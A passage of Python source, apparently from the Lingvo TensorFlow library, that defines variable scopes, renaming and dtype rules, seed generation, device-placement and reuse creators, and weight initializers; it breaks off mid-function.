_SESSION_SCOPE = ThreadLocalStack()
@contextlib.contextmanager
def UnitTestSessionScope(sess):
_SESSION_SCOPE.stack.append(sess)
try:
yield
finally:
_SESSION_SCOPE.stack.pop()
def GetUnitTestSession():
"""Get the current variable reuse setting."""
return _SESSION_SCOPE.stack[-1] if _SESSION_SCOPE.stack else None
# Global variable to control multitask variable reuse
# If False (default) the default tf.get_variable is used, that is:
# - Reusing scopes only allow getting existing variables
# - Non-reusing scopes only allow getting new variables
# With GetOpportunisticVariableReuse() == True:
# - Reusing scopes only allow getting existing variables, as usual
# - Non-reusing scopes reuse new variables or get new ones
_OPPORTUNISTIC_VARIABLE_REUSE = ThreadLocalStack()
@contextlib.contextmanager
def OpportunisticVariableReuseScope(enable_opportunistic_reuse=True):
_OPPORTUNISTIC_VARIABLE_REUSE.stack.append(enable_opportunistic_reuse)
try:
yield
finally:
_OPPORTUNISTIC_VARIABLE_REUSE.stack.pop()
def GetOpportunisticVariableReuse():
"""Get the current variable reuse setting."""
return (_OPPORTUNISTIC_VARIABLE_REUSE.stack[-1]
if _OPPORTUNISTIC_VARIABLE_REUSE.stack else False)
_DISABLE_VARIABLE_NAME_CHECKING = ThreadLocalStack()
@contextlib.contextmanager
def DisableVariableNameChecking(disable=True):
_DISABLE_VARIABLE_NAME_CHECKING.stack.append(disable)
try:
yield
finally:
_DISABLE_VARIABLE_NAME_CHECKING.stack.pop()
_VARIABLE_RENAME_RULES = ThreadLocalStack()
# Global variable to track task calling scope.
# Currently only used for TPU Embedding purposes as a TPUEmbeddingLayer
# may be shared across tasks and the calling task needs to be known
# for tracking embedding activations for backprop.
_TASK_CALL_SCOPE = ThreadLocalStack()
def TaskCallScopeName(task):
"""Get a unique string identifying a task."""
return f'{task.params.name}_{id(task)}'
@contextlib.contextmanager
def TaskCallScope(task):
_TASK_CALL_SCOPE.stack.append(TaskCallScopeName(task))
try:
yield
finally:
_TASK_CALL_SCOPE.stack.pop()
def GetTaskCallScope():
"""Get the current task call scope."""
return _TASK_CALL_SCOPE.stack[-1] if _TASK_CALL_SCOPE.stack else None
@contextlib.contextmanager
def VariableRenameScope(renames):
"""Append the renaming rules to the stack of renames.
Args:
renames: pairs of (regexp, new_name_format). If the regexp matches, the
new_name_format will be interpolated using the matched groups.
Yields:
scope in which the renaming rules are applied
"""
_VARIABLE_RENAME_RULES.stack.append(renames)
try:
yield
finally:
_VARIABLE_RENAME_RULES.stack.pop()
def GetVariableName(name):
"""Get variable name after application of all renaming rules.
Args:
name: untransformed variable name with scope_name prepended
Returns:
name possibly modified using renaming rules
"""
matched = False
new_name = name
for renames in _VARIABLE_RENAME_RULES.stack:
tf.logging.log_first_n(
tf.logging.WARN,
('Renaming variables is not supported in eager mode. '
'Please look into migrating away from variable renaming.'), 1)
for regexp, name_format in renames:
match = re.match(regexp, name)
if match:
if matched:
tf.logging.warning('Multiple matches for: %s', name)
matched = True
new_name = name_format % match.groups()
if new_name != name:
tf.logging.info("WARNING!!! Renaming variable '%s' to '%s'", name, new_name)
return new_name
_LIST_REGEX_DTYPE = ThreadLocalStack()
@contextlib.contextmanager
def VariableListDtypeRegexScope(list_regex_dtypes):
"""Append the list of (regex, dtype) to override the dtype.
Args:
list_regex_dtypes: pairs of (regexp, dtype). If the regexp matches, the data
type of the variable will be changed by the corresponding dtype.
Yields:
scope in which the list of (regex, dtype) is applied.
"""
_LIST_REGEX_DTYPE.stack.append(list_regex_dtypes)
try:
yield
finally:
_LIST_REGEX_DTYPE.stack.pop()
def FindDataType(var_name):
"""Find the data type for var_name.
Args:
var_name: A string, name of the variable.
Returns:
The dtype of the first matched regex with var_name, or None if no matching
found.
"""
for regex_dtypes in _LIST_REGEX_DTYPE.stack:
for regex, data_type in regex_dtypes:
if re.match(regex, var_name):
return data_type
return None
def GenerateSeedFromName(name):
"""Generate a random seed from a name string.
Args:
name: A string.
Returns:
An integer seed in the range [0, 2**31 - 1).
"""
md5 = hashlib.md5()
md5.update(six.ensure_binary(name))
return np.int64(int(md5.hexdigest(), 16) % (2**31 - 1))
def MaybeGenerateSeedFromScope():
"""Generate a random seed from the current name of the scope.
If running in eager mode, this returns 0.
Returns:
An integer seed in the range [0, 2**31 - 1).
"""
if not tf.executing_eagerly():
return GenerateSeedFromName(tf.no_op(name='new_step_seed').name)
return 0
def GenerateSeedFromId(obj_id):
"""Generate a random seed from the id of an object.
If deterministic execution (i.e. unit test), generate the seed from a fixed
unique name instead.
Args:
obj_id: id(object).
Returns:
An integer seed in the range [0, 2**31 - 1).
"""
if tf.get_default_graph().seed is not None:
# We are in a program/test which need determistic randomization.
with tf.name_scope(''):
return GenerateSeedFromName(tf.no_op(name='new_step_seed').name)
md5 = hashlib.md5()
md5.update(np.int64(obj_id))
return np.int64(int(md5.hexdigest(), 16) % (2**31 - 1))
_VARIABLE_SHAPE_PREFIXES = ThreadLocalStack()
def GetVarLeadingDimsAsCombinedLayers(var):
"""Gets the number of leading dimensions of `var` marked as combined layers.
Such dimensions represent variables from different layers stacked together,
e.g., in RepeatLayer, and optimizers (which have shape-dependant behaviors)
can adjust its behavior based on this information to match the behavior for
separate layer variables.
Args:
var: A variable.
Returns:
An integer representing the number of leading dimensions.
"""
try:
return var.op.get_attr('_num_leading_dims_for_combined_layers')
except ValueError:
return 0
except AttributeError:
# AttributeError: 'DistributedVarOp' object has no attribute 'get_attr'.
return 0
@contextlib.contextmanager
def VariableShapePrefixContext(shape_prefix):
"""Add a shape prefix to variable created by CreateVariable().
This new dimension will be marked as combined-layers. See also comments for
GetVarLeadingDimsAsCombinedLayers().
Args:
shape_prefix: a positive integer of shape prefix.
Yields:
None.
"""
assert shape_prefix > 0, ('%s' % shape_prefix)
_VARIABLE_SHAPE_PREFIXES.stack.append(shape_prefix)
try:
yield
finally:
_VARIABLE_SHAPE_PREFIXES.stack.pop()
def GetVariableShapePrefixes():
"""Return the list of shape prefixes for CreateVariable()."""
return _VARIABLE_SHAPE_PREFIXES.stack
def GetVariableNumLeadingDimsForCombinedLayersContext():
"""Return the number of leading combined-layers dims for CreateVariable()."""
return len(_VARIABLE_SHAPE_PREFIXES.stack)
def GetFanInFanOut(shape, prefix_dims_to_skip):
"""Returns (fan_in, fan_out) of a weight variable of the give shape."""
if not shape:
return None, None
if len(shape) < prefix_dims_to_skip:
raise ValueError(f'Variable shape is {shape} but prefix_dims_to_skip is '
f'{prefix_dims_to_skip}, larger than the shape rank.')
adjusted_shape = shape[prefix_dims_to_skip:]
if len(adjusted_shape) < 1:
return 1, 1
elif len(adjusted_shape) == 1:
# Following _compute_fans() from TF's init_ops.py.
return adjusted_shape[0], adjusted_shape[0]
else:
receptive_field_size = 1
for s in adjusted_shape[:-2]:
receptive_field_size *= s
fan_in = adjusted_shape[-2] * receptive_field_size
fan_out = adjusted_shape[-1] * receptive_field_size
return fan_in, fan_out
@contextlib.contextmanager
def VariableStore(default_store=None):
"""Keeps track of {variable_name: (variable, var_params)}.
When CreateVariable would result in a variable name that exists in the store,
the existing variable is returned, or an error is raised, depending on whether
the variable scope supports reuse.
This mimics the behavior of tf.compat.v1.get_variable() with regards to
variable reuse, while functioning correctly in TF2 eager context. However, it
only applies to variables created via CreateVariable.
When there are nested VariableStore contexts, they all provide the same
variable store object. That is, the scope of the variable store is the
outermost context.
Args:
default_store: variable store dict. If set, and there is no store in the
stack, use this store instead of creating a new dict.
Yields:
A dictionary representing the variable store.
"""
old_store = _GetVariableStore()
default_store = default_store or {}
store = old_store if old_store is not None else default_store
graph = tf.get_default_graph()
while hasattr(graph, 'outer_graph') and graph.outer_graph:
graph = graph.outer_graph
graph.lingvo_variable_store = store
yield store
graph.lingvo_variable_store = old_store
def _GetVariableStore():
graph = tf.get_default_graph()
while hasattr(graph, 'outer_graph') and graph.outer_graph:
graph = graph.outer_graph
if hasattr(graph, 'lingvo_variable_store'):
return graph.lingvo_variable_store
return None
def _DefaultVariableCreator(**kwargs):
kwargs.pop('var_name')
kwargs.pop('var_params')
return tf.get_variable(**kwargs)
_VARIABLE_CREATOR_STACK = ThreadLocalStack()
def _GetVariableCreator():
fn = _DefaultVariableCreator
# Latest entry in _VARIABLE_CREATOR_STACK is called last.
for wrapper in reversed(_VARIABLE_CREATOR_STACK.stack):
fn = functools.partial(wrapper, fn)
return fn
@contextlib.contextmanager
def VariableCreatorScope(variable_creator):
"""Yields a context around a variable_creator, used by `CreateVariable()`.
The function must have the following signature::
def variable_creator(next_creator, **kwargs)
The function may delegate variable creation to the next variable creator, or
return its own tf.Variable.
This differs from tf.variable_creator_scope in that tf.variable_creator_scope
modifies a tf.Variable() call while this modifies a tf.get_variable() call. As
the code is migrated to TF2 and tf.get_variable() is deprecated, this may be
upgraded to using tf.variable_creator_scope instead.
This differs from tf.variable_scope(custom_getter=variable_creator) in that
the kwargs passed can be manipulated.
Variable creators are resolved from the outermost towards the innermost.
The innermost variable creator function is tf.get_variable.
The passed in kwargs must conform to what tf.get_variable accepts, with the
addition of `var_name` and `var_params`.
Args:
variable_creator: A variable creator function.
"""
_VARIABLE_CREATOR_STACK.stack.append(variable_creator)
try:
yield
finally:
_VARIABLE_CREATOR_STACK.stack.pop()
def PlaceOnTpuCore(core_id):
"""Returns a VariableCreatorScope that places variables on a given tpu core.
Only applies when running with TPUs.
Does not yet properly support model parallelism.
Args:
core_id: The tpu core id.
"""
def Creator(next_creator, **kwargs):
cluster = cluster_factory.Current()
if use_tpu():
device = cluster.WorkerDeviceInModelSplit(core_id)
elif (
tpu_compat() and
cluster.params.job in ('controller', 'trainer_client', 'executor_tpu')):
# The job is running in a fleet that uses tpu, but does not itself have
# access to the tpu, e.g. controller job. In this case, the returned
# device needs to be the cpu device on the tpu host for the given core.
# FIXME: the current implementation is wrong for large values of core_id.
device = cluster.ListDevices(cluster.params.worker)[0, 0]
else:
device = ''
with tf.device(device):
return next_creator(**kwargs)
return VariableCreatorScope(Creator)
# Variable creators.
def MaybeReuseFromVariableStore(next_creator, **kwargs):
"""Variable creator that attempts to reuse variables from variable store."""
var_name = kwargs['var_name']
p = kwargs['var_params']
store = _GetVariableStore()
if store is not None:
if var_name in store:
if tf.get_variable_scope().reuse:
var, cached_p = store[var_name]
tf.logging.info('Reusing var %s', var.name)
assert cached_p == p.ToText(), (
'Cached config:\n %s vs new config:\n %s' % (cached_p, p.ToText()))
return var
var = next_creator(**kwargs)
if not _DISABLE_VARIABLE_NAME_CHECKING:
if var.name != f'{var_name}/var:0':
raise ValueError(
'Expected %s but created variable %s. Did you mean to set reuse=True '
'or reuse=tf.AUTO_REUSE in VarScope, or did not create a '
'VariableStore for variable reuse?' % (f'{var_name}/var:0', var.name))
tf.logging.info('Creating var %s shape=%s on device %s', var.name, var.shape,
var.device)
for col in p.collections:
tf.add_to_collection(col, var)
if store is not None:
store[var_name] = (var, p.ToText())
return var
def MaybePinVarsToCpu(next_creator, **kwargs):
if _FromGlobal('pin_vars_to_cpu'):
with tf.device('/cpu:0'):
return next_creator(**kwargs)
return next_creator(**kwargs)
def MaybeOpportunisticVariableReuse(next_creator, **kwargs):
if GetOpportunisticVariableReuse():
with tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE):
return next_creator(**kwargs)
return next_creator(**kwargs)
def GetLingvoVariableCreator(name, var_name):
"""Returns a variable creator function."""
def LingvoVariableCreator(next_creator, **kwargs):
"""Lingvo variable creator."""
# TODO(yonghui): Possibly get away from variable_scope and implement our own
# variable sharing mechanism.
with tf.variable_scope(name) as scope:
var_scope = tf.VariableScope(
scope.reuse,
custom_getter=scope.custom_getter,
caching_device=scope.caching_device,
use_resource=True)
with tf.variable_scope(var_scope), tf.variable_scope(var_name):
return next_creator(**kwargs)
return LingvoVariableCreator
# TODO(yonghui): Add support for partitioned Variables.
def CreateVariable(name,
params,
trainable=True,
collections=None,
default_seed=None,
synchronization=tf.VariableSynchronization.AUTO,
aggregation=tf.VariableAggregation.NONE):
"""Creates tf.Variable according to param_config.
Args:
name: A string, name of the variable.
params: A WeightParams specifying the details of how this variable should be
constructed and initialized.
trainable: Whether or not the variable is trainable.
collections: Override the default variable collection (
tf.GraphKeys.GLOBAL_VARIABLES). Note that specifying a collections
argument in `params` does not override this collection; the caller must
set this field explicitly in the call to CreateVariable().
default_seed: Seed to use for initialization if not specified in params.
Used for deterministic initialization in tests.
synchronization: Indicates when a distributed a variable will be aggregated.
Accepted values are constants defined in the class
tf.VariableSynchronization. By default the synchronization is set to AUTO
and the current DistributionStrategy chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class tf.VariableAggregation.
Returns:
The created variable.
"""
if use_stateless_vars_init():
return _CreateVariableStateless(name, params, trainable, collections,
default_seed, synchronization, aggregation)
else:
return _CreateVariableStateful(name, params, trainable, collections,
default_seed, synchronization, aggregation)
def _CreateVariableStateful(name,
params,
trainable=True,
collections=None,
default_seed=None,
synchronization=tf.VariableSynchronization.AUTO,
aggregation=tf.VariableAggregation.NONE):
"""Creates tf.Variable using TF stateful RNGs according to param_config.
Args:
name: A string, name of the variable.
params: A WeightParams specifying the details of how this variable should be
constructed and initialized.
trainable: Whether or not the variable is trainable.
collections: Override the default variable collection (
tf.GraphKeys.GLOBAL_VARIABLES).
default_seed: Seed to use for initialization if not specified in params.
Used for deterministic initialization in tests.
synchronization: Indicates when a distributed a variable will be aggregated.
Accepted values are constants defined in the class
tf.VariableSynchronization. By default the synchronization is set to AUTO
and the current DistributionStrategy chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class tf.VariableAggregation.
Returns:
The created variable.
"""
p = params.Copy()
shape = tf.TensorShape(ToStaticShape(p.shape)).as_list()
if shape:
assert all([dim_size > 0 for dim_size in shape]), shape
dim0 = shape[0]
else:
dim0 = 1
assert p.init.method == 'constant' or np.all(np.asarray(p.init.scale) >= 0)
method = p.init.method
scale = p.init.scale
seed = p.init.seed
if IsDefaultParamInit(p.init):
tf.logging.warning(
'WARNING!!! var %s is using the default xavier initializer.'
' Make sure this is intended.', name)
with tf.variable_scope(name) as scope:
var_name = GetVariableName(scope.name)
if tf.get_default_graph().seed is not None:
# We are in a program/test which need determistic randomization.
if seed is None:
if default_seed is not None:
seed = default_seed
else:
# We are not given a per-variable random seed. We use hash of
# variable name as a stable random seed.
seed = GenerateSeedFromName(var_name)
# If var_name matches a regex, then set the var_dtype; else use p.dtype.
var_dtype = FindDataType(var_name)
if var_dtype is None:
var_dtype = p.dtype
init_dtype = var_dtype.real_dtype
# TODO(b/172827074): we do not natively support var initialization for
# int8 type except for constant initialization.
# NOTE: For int8, we initialize by scaling float32 random values to integer.
if init_dtype == tf.int8:
init_dtype = tf.float32
v_init = _CreateVarInitStateful(name, method, shape, dim0, seed, scale,
init_dtype, p.init.custom_v_init)
if var_dtype == tf.complex64:
def ComplexWrapper(init):
def _Wrapper(shape, dtype):
del dtype
# A more complex alternative may be to use the init function for
# magnitudes and uniform random for phases instead.
shape = [2] + shape
value = init(shape, init_dtype)
return tf.complex(value[0], value[1])
return _Wrapper
v_init = ComplexWrapper(v_init)
if var_dtype == tf.int8:
def FloatToInt8Wrapper(init):
def _Wrapper(shape, dtype):
del dtype
value = init(shape, init_dtype)
scale = tf.math.maximum(
tf.math.reduce_min(value) / -127,
tf.math.reduce_max(value) / 127)
value = tf.divide(value, scale)
return tf.cast(value, tf.int8)
return _Wrapper
v_init = FloatToInt8Wrapper(v_init)
with contextlib.ExitStack() as context_stack:
for variable_creator_fn in (GetLingvoVariableCreator(name, var_name),
MaybeOpportunisticVariableReuse,
MaybePinVarsToCpu, MaybeReuseFromVariableStore):
context_stack.enter_context(VariableCreatorScope(variable_creator_fn))
if method == 'custom_constant':
call_shape = None
else:
call_shape = GetVariableShapePrefixes() + list(shape)
var = _GetVariableCreator()(
var_name=var_name,
var_params=p,
name='var',
shape=call_shape,
dtype=var_dtype,
initializer=v_init,
collections=collections,
trainable=trainable,
validate_shape=True,
synchronization=synchronization,
aggregation=aggregation)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
if combined_layers_dims > 0:
# pylint: disable=protected-access
var.op._set_attr('_num_leading_dims_for_combined_layers',
attr_value_pb2.AttrValue(i=combined_layers_dims))
# Shard the variable according to the sharding spec.
tensor_split_dims_mapping = p.tensor_split_dims_mapping
if tensor_split_dims_mapping is not None:
count = (
len(GetVariableShapePrefixes()) + len(shape) -
len(tensor_split_dims_mapping) -
len(gshard_utils.GetMeshSplitDimPrefixContext()))
tensor_split_dims_mapping = [-1] * count + tensor_split_dims_mapping
var = gshard_utils.MeshSplit(
var, p.device_mesh, tensor_split_dims_mapping, use_sharding_op=False)
return var
def _CreateVariableStateless(name,
params,
trainable=True,
collections=None,
default_seed=None,
synchronization=tf.VariableSynchronization.AUTO,
aggregation=tf.VariableAggregation.NONE):
"""Creates tf.Variable using TF stateless RNGs according to `params`.
Args:
name: A string, name of the variable.
params: A WeightParams specifying the details of how this variable should be
constructed and initialized.
trainable: Whether or not the variable is trainable.
collections: Override the default variable collection (
tf.GraphKeys.GLOBAL_VARIABLES).
default_seed: Seed to use for initialization if not specified in params.
Used for deterministic initialization in tests.
synchronization: Indicates when a distributed a variable will be aggregated.
Accepted values are constants defined in the class
tf.VariableSynchronization. By default the synchronization is set to AUTO
and the current DistributionStrategy chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class tf.VariableAggregation.
Returns:
The created variable.
"""
p = params.Copy()
shape = tf.TensorShape(ToStaticShape(p.shape)).as_list()
if shape:
assert all([dim_size > 0 for dim_size in shape]), shape
dim0 = shape[0]
else:
dim0 = 1
assert p.init.method == 'constant' or np.all(np.asarray(p.init.scale) >= 0)
method = p.init.method
scale = p.init.scale
seed = p.init.seed
if IsDefaultParamInit(p.init):
tf.logging.warning(
'WARNING!!! var %s is using the default xavier initializer.'
' Make sure this is intended.', name)
with tf.variable_scope(name) as scope:
var_name = GetVariableName(scope.name)
user_seed = seed if seed is not None else default_seed
seed = _GenerateStatelessRngSeed(var_name, user_seed)
# If var_name matches a regex, then set the var_dtype; else use p.dtype.
var_dtype = FindDataType(var_name)
if var_dtype is None:
var_dtype = p.dtype
init_dtype = var_dtype.real_dtype
v_init = _CreateVarInitStateless(name, method, shape, dim0, seed, scale,
init_dtype, p.init.custom_v_init)
if var_dtype == tf.complex64:
raise TypeError(
'Stateless variable initialization does not support tf.complex64.')
with contextlib.ExitStack() as context_stack:
for variable_creator_fn in (GetLingvoVariableCreator(name, var_name),
MaybeOpportunisticVariableReuse,
MaybeReuseFromVariableStore):
context_stack.enter_context(VariableCreatorScope(variable_creator_fn))
var = _GetVariableCreator()(
var_name=var_name,
var_params=p,
name='var',
shape=GetVariableShapePrefixes() + list(shape),
dtype=var_dtype,
initializer=v_init,
collections=collections,
trainable=trainable,
validate_shape=True,
synchronization=synchronization,
aggregation=aggregation)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
if combined_layers_dims > 0:
# pylint: disable=protected-access
var.op._set_attr('_num_leading_dims_for_combined_layers',
attr_value_pb2.AttrValue(i=combined_layers_dims))
# Shard the variable according to the sharding spec.
tensor_split_dims_mapping = p.tensor_split_dims_mapping
if tensor_split_dims_mapping is not None:
count = (
len(GetVariableShapePrefixes()) + len(shape) -
len(tensor_split_dims_mapping) -
len(gshard_utils.GetMeshSplitDimPrefixContext()))
tensor_split_dims_mapping = [-1] * count + tensor_split_dims_mapping
var = gshard_utils.MeshSplit(
var, p.device_mesh, tensor_split_dims_mapping, use_sharding_op=False)
return var
def _RandomXavierUniformInitializer(method, scale, seed):
"""Creates a random Xavier uniform initializer."""
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
def XavierUniform(shape, dtype):
"""Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
if not shape:
raise ValueError('\'shape\' must not be \'None\' or 0 for XavierUniform')
fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if method == 'xavier':
limit = math.sqrt(6. / (fan_in + fan_out))
elif method == 'geo_mean_xavier':
limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
return scale * tf.random.uniform(shape, -limit, limit, dtype, seed)
return XavierUniform
def _CreateVarInitStateful(name,
method,
shape,
dim0,
seed,
scale,
init_dtype,
custom_v_init=None):
"""Creates variable initialization function for a stateful RNG."""
if (method in [
'gaussian_sqrt_dim', 'uniform_sqrt_dim', 'truncated_gaussian_sqrt_dim'
]):
if len(shape) > 2:
# This is probably not the right method to use when len(shape) > 2,
# e.g. dim0 will be 3 with a 3x3 conv2d kernel.
tf.logging.warning(
'Initializing %s of shape %s with method %s: dim0=%s. '
'Make sure that it is intended.', name, shape, method, dim0)
scale *= 1.0 / math.sqrt(dim0)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
if method in ['gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanin']:
fan_in, _ = GetFanInFanOut(shape, combined_layers_dims)
if fan_in is not None:
scale *= 1.0 / math.sqrt(fan_in)
if method in ['gaussian_sqrt_fanout', 'truncated_gaussian_sqrt_fanout']:
_, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if fan_out is not None:
scale *= 1.0 / math.sqrt(fan_out)
if method in ['gaussian_sqrt_fanavg']:
fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if fan_in is not None and fan_out is not None:
scale *= math.sqrt(2.0 / (fan_in + fan_out))
if method in [
'gaussian', 'gaussian_sqrt_dim', 'gaussian_sqrt_fanin',
'gaussian_sqrt_fanout', 'gaussian_sqrt_fanavg'
]:
v_init = init_ops.random_normal_initializer(
mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform', 'uniform_sqrt_dim']:
v_init = init_ops.random_uniform_initializer(
minval=-scale, maxval=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform_positive']:
v_init = init_ops.random_uniform_initializer(
minval=0.0, maxval=scale, seed=seed, dtype=init_dtype)
elif method == 'category':
uniform_init = init_ops.random_uniform_initializer(
minval=0.0, maxval=scale, seed=seed, dtype=init_dtype)
v_init = lambda *args, **kwargs: tf.floor(uniform_init(*args, **kwargs))
elif method in ['uniform_unit_scaling']:
v_init = init_ops.uniform_unit_scaling_initializer(
factor=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform_unit_scaling_fan_avg']:
v_init = tf.variance_scaling_initializer(
scale=scale,
mode='fan_avg',
distribution='uniform',
seed=seed,
dtype=init_dtype)
elif method in [
'truncated_gaussian', 'truncated_gaussian_sqrt_dim',
'truncated_gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanout'
]:
v_init = init_ops.truncated_normal_initializer(
mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
elif method in ['constant']:
v_init = init_ops.constant_initializer(value=scale, dtype=init_dtype)
elif method in ['xavier', 'geo_mean_xavier']:
def XavierUniform(shape, dtype):
"""Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
if not shape:
raise ValueError(
'\'shape\' must not be \'None\' or 0 for XavierUniform')
fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if method == 'xavier':
limit = math.sqrt(6. / (fan_in + fan_out))
elif method == 'geo_mean_xavier':
limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
return scale * tf.random.uniform(shape, -limit, limit, dtype, seed)
v_init = XavierUniform
elif method in [
'kaiming_uniform_fanin_relu', 'kaiming_uniform_fanin_leakyrelu'
]:
fan_in = np.prod(shape[:-1])
if method == 'kaiming_uniform_fanin_leakyrelu':
# Assume the 'a' parameter is the 'scale' argument.
gain = np.sqrt(2. / (1 + scale**2))
else:
gain = np.sqrt(2.)
std_dev = gain / np.sqrt(fan_in)
bound = np.sqrt(3.0) * std_dev
v_init = init_ops.random_uniform_initializer(
minval=-bound, maxval=bound, seed=seed, dtype=init_dtype)
elif method in ['custom', 'custom_constant']:
v_init = custom_v_init
else:
assert False, 'init_type `%s` not supported.' % method
return v_init
def _GenerateStatelessRngSeed(name, seed):
"""Generates a 2-tuple seed for a stateless variable initializer.
We want to ensure that different variables end up with different random values
even when they are passed the same seed and shape. To this aim, this function
generates a pseudo-unique seed by hashing the variable name and mapping it
into a scalar seed. More specifically, the returned value is a 2-tuple of
tf.int32 scalar, where the first element is the user-provided seed and the
second element is obtained by hashing the variable name.
Args:
name: The variable name for which to generate a stateless-like seed.
seed: The user-specified scalar seed.
Returns:
A 2-tuple seed of tf.int32 values (for TPU compatibility).
"""
seed0 = seed or 0
seed1 = GenerateSeedFromName(name)
return tf.constant([seed0, seed1], dtype=tf.int32)
def _DeterministicRandomNormalInitializer(seed, mean, stddev):
"""Creates a random normal initializer."""
def DeterministicNormal(shape, dtype):
return stateless_random_ops.stateless_random_normal(
shape=shape, seed=seed, mean=mean, stddev=stddev, dtype=dtype)
return DeterministicNormal
def _DeterministicRandomUniformInitializer(seed, minval, maxval):
"""Creates a random uniform initializer."""
def DeterministicUniform(shape, dtype):
return stateless_random_ops.stateless_random_uniform(
shape=shape, seed=seed, minval=minval, maxval=maxval, dtype=dtype)
return DeterministicUniform
def _DeterministicRandomTruncatedNormalInitializer(seed, mean, stddev):
"""Creates a random truncated normal initializer."""
def DeterministicTruncatedNormal(shape, dtype):
return stateless_random_ops.stateless_truncated_normal(
shape=shape, seed=seed, mean=mean, stddev=stddev, dtype=dtype)
return DeterministicTruncatedNormal
def _DeterministicRandomUniformUnitScalingInitializer(seed, factor):
"""Creates a random uniform unit scaling initializer."""
def DeterministicUniformUnitScaling(shape, dtype):
# The following logic is originally from (UniformUnitScaling.__call__())
# in TensorFlow: python/ops/init_ops.py
scale_shape = shape
input_size = 1.0
# Estimating input size is not possible to do perfectly, but we try.
# The estimate, obtained by multiplying all dimensions but the last one,
# is the right thing for matrix multiply and convolutions (see above).
for dim in scale_shape[:-1]:
input_size *= float(dim)
# Avoid errors when initializing zero-size tensors.
input_size = max(input_size, 1.0)
maxval = math.sqrt(3 / input_size) * factor
return stateless_random_ops.stateless_random_uniform(
shape=shape, seed=seed, minval=-maxval, maxval=maxval, dtype=dtype)
return DeterministicUniformUnitScaling
def _DeterministicRandomVarianceScalingInitializer(scale, mode, distribution,
seed):
"""Creates a variance scaling initializer."""
if scale <= 0.:
raise ValueError('`scale` must be positive float.')
if mode not in {'fan_in', 'fan_out', 'fan_avg'}:
raise ValueError('Invalid `mode` argument:', mode)
distribution = distribution.lower()
if distribution not in {
'normal', 'uniform', 'truncated_normal', 'untruncated_normal'
}:
raise ValueError('Invalid `distribution` argument:', distribution)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
def DeterministicVarianceScaling(shape, dtype):
# This is originally from TensorFlow: python/ops/init_ops.py
scale_shape = shape
# Handle special case of empty list as shape, since fan_in and fan_out
# are numerically added below. Without this, GetFanInFanOut() would
# return None, None instead.
if isinstance(scale_shape, (list, tuple)) and not scale_shape:
fan_in, fan_out = 1, 1
else:
fan_in, fan_out = GetFanInFanOut(scale_shape, combined_layers_dims)
if mode == 'fan_in':
scale_inner = scale / max(1., fan_in)
elif mode == 'fan_out':
scale_inner = scale / max(1., fan_out)
else:
scale_inner = scale / max(1., (fan_in + fan_out) / 2.)
if distribution == 'normal' or distribution == 'truncated_normal':
# constant taken from scipy.stats.truncnorm.std(
# a=-2, b=2, loc=0., scale=1.)
stddev = math.sqrt(scale_inner) / .87962566103423978
return stateless_random_ops.stateless_truncated_normal(
shape=shape, seed=seed, mean=0.0, stddev=stddev, dtype=dtype)
elif distribution == 'untruncated_normal':
stddev = math.sqrt(scale_inner)
return stateless_random_ops.stateless_random_normal(
shape=shape, seed=seed, mean=0.0, stddev=stddev, dtype=dtype)
else:
limit = math.sqrt(3.0 * scale_inner)
return stateless_random_ops.stateless_random_uniform(
shape=shape, seed=seed, minval=-limit, maxval=limit, dtype=dtype)
return DeterministicVarianceScaling
def _DeterministicRandomXavierUniformInitializer(method, scale, seed):
"""Creates a variance scaling initializer."""
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
def XavierUniform(shape, dtype):
"""Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
if not shape:
raise ValueError('\'shape\' must not be \'None\' or 0 for XavierUniform')
fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if method == 'xavier':
limit = math.sqrt(6. / (fan_in + fan_out))
elif method == 'geo_mean_xavier':
limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
return scale * stateless_random_ops.stateless_random_uniform(
shape, seed, -limit, limit, dtype)
return XavierUniform
def _CreateVarInitStateless(name,
method,
shape,
dim0,
seed,
scale,
init_dtype,
custom_v_init=None):
"""Creates variable initialization function for a stateless RNG."""
if (method in [
'gaussian_sqrt_dim', 'uniform_sqrt_dim', 'truncated_gaussian_sqrt_dim'
]):
if len(shape) > 2:
# This is probably not the right method to use when len(shape) > 2,
# e.g. dim0 will be 3 with a 3x3 conv2d kernel.
tf.logging.warning(
'Initializing %s of shape %s with method %s: dim0=%s. '
'Make sure that it is intended.', name, shape, method, dim0)
scale *= 1.0 / math.sqrt(dim0)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
if method in ['gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanin']:
fan_in, _ = GetFanInFanOut(shape, combined_layers_dims)
if fan_in is not None:
scale *= 1.0 / math.sqrt(fan_in)
if method in ['gaussian_sqrt_fanout', 'truncated_gaussian_sqrt_fanout']:
_, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if fan_out is not None:
scale *= 1.0 / math.sqrt(fan_out)
if method in ['gaussian_sqrt_fanavg']:
